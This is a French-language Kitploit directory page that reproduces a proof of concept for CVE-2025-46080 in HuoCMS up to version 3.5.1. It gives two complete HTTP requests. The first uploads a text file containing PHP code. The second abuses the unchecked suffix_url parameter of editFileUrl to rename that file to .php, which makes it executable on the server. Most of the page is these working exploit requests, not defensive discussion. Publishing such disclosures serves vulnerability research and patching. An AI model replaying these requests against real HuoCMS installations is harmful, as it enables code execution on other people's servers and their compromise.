Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-46080 — Détails | Kitploit
Outils/GitHubGitHub/yggcwhat/cve-2025-46080
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebSécurité WebMauvaise Configuration
GitHubyggcwhat/cve-2025-46080

CVE-2025-46080

Détails

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Auteur du bug:

yggcwhat

Version affectée:

Huocms

Fournisseur:

https://huocms.com/

Adresse du code source:

https://gitee.com/digital-flag/huocms

Fichier de vulnérabilité:

AttachmentController.php

Version affectée:

HuoCMS - <=V3.5.1

Description:

app ->controller ->backend -> AttachmentController.php:editFileUrl()

Le suffixe de $newPathUrl dans la fonction « copy » appelée dans la méthode « editFileUrl » n'est pas vérifié par la liste blanche, ce qui peut être exploité pour modifier le nom du fichier. Le suffixe est contrôlé par le paramètre suffix_url transmis et est contrôlable.

image

Étape 1 : Téléversez un fichier avec un suffixe autorisé contenant du contenu malveillant à l'avance, et enregistrez l'ID du fichier en même temps.

root@kitploit:~
POST /attachment/uploadAndSave HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization:  token
Content-Type: multipart/form-data; boundary=----geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Length: 581
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin.php/Index/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="type"

2
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="attachment_cate_id"

0
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="reduce_img"


------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

<?php
echo "hello word!"
?>
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9--

image

D'après le contenu, l'ID est déterminé comme étant 67.

Étape 2 : Construisez ensuite une requête basée sur editFileUrl, renommez celui avec l'ID 67, où la fonction copy dans le editFileUrl vulnérable est appelée pour renommer le fichier avec un suffixe illégal.

root@kitploit:~
POST /attachment/editFileUrl HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Authorization: token
Content-Length: 83
Origin: http://127.0.0.1
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

id=67&name=test&prefix_url=&suffix_url=file/20250416/test.php&description=123123123

image

Remarque : Pour le modifier à nouveau, vous devez changer le nom de fichier de suffix_url pour contourner la fonction copy déclenchée par $oldPathUrl != $newPathUrl dans editFileUrl.

URL d'accès: http://127.0.0.1/storage/file/20250416/test.php

image

Référence:

http://huocms.com https://github.com/yggcwhat/CVE-2025-46080/edit/main/README.md https://www.huocms.com/

Télécharger l’outil